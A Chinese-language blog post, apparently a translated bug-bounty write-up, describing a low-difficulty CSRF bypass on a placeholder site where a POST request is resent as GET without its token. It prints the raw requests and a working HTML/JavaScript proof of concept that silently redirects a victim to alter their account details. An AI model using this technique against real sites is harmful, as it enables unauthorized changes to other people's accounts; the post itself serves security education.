漏洞:利用GET代替POST,绕过CSRF防护 难度:低
嗨,伙计们!与你们分享一些好的东西总是很愉快的。从文章的标题就可以猜到今天我将分享一些关于绕过CSRF防护的技术。 什么是CSRF保护? 简而言之,CSRF(跨站请求伪造)攻击是一种专门针对WEB站点状态更改请求的攻击。为了防止这种攻击,开发人员以多种方式在request请求中添加了ANTI-CSRF token令牌。如果你想了解详细的原理可以看看这两篇文章 “Article-1 “,”Article-2 “ 现在我们假设站点域名为vulnhost.com,该站点根据一个POST请求提供的数据验证我们的请求。vulnhost.com实际上是先将_csrf token标记到POST请求中,然后再在服务器端验证_csrf token [*]状态更改请求看起来像是下面这样的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact HTTP/1.1
Host: en.vulnhost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://en.vulnhost.com/mycenter/settings/account.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Wicket-Ajax: true
Migration-Wicket: 6
Wicket-Ajax-BaseURL: mycenter/settings/account.html
Wicket-FocusedElementId: id49
X-Requested-With: XMLHttpRequest
Content-Length: 246
Cookie: .......
Connection: close
.
_csrf=725a7f90-192f-4b94-8fc9-6320ace14fef&id48_hf_0=&gender=radio8&firstName=xx&lastName=YY&saveContact=1
这里,_csrf=…. 用来生成随机令牌,并提交给服务端进行验证。如果我利用GET方法发送请求,并将_csrf令牌删除,那么服务端将不会对其进行验证 1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=XX&lastName=YY&saveContact=1 HTTP/1.1
Host: en.vulnhost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://en.vulnhost.com/mycenter/settings/account.html
Wicket-Ajax: true
Migration-Wicket: 6
Wicket-Ajax-BaseURL: mycenter/settings/account.html
Wicket-FocusedElementId: id49
X-Requested-With: XMLHttpRequest
Cookie: ...
Connection: close
为了解决这个问题,我结合了javascript和HTML来构造POC 1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<script type="text/javascript">
var timer = null;
function auto_reload()
{
window.location = 'https://en.vulnhost.com/mycenter/settings/account.html?4-2.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=Account&lastName=Takeover&saveContact=1';
}
</script>
<body>
<!-- Reload page every 5 seconds. -->
<body onload="timer = setTimeout('auto_reload()',5000);">
</body>
</html>
这样只要victim访问了我定制的网页,受害者就会被重定向到CSRF页面,并自动更改受害者的账号信息! 打赏译者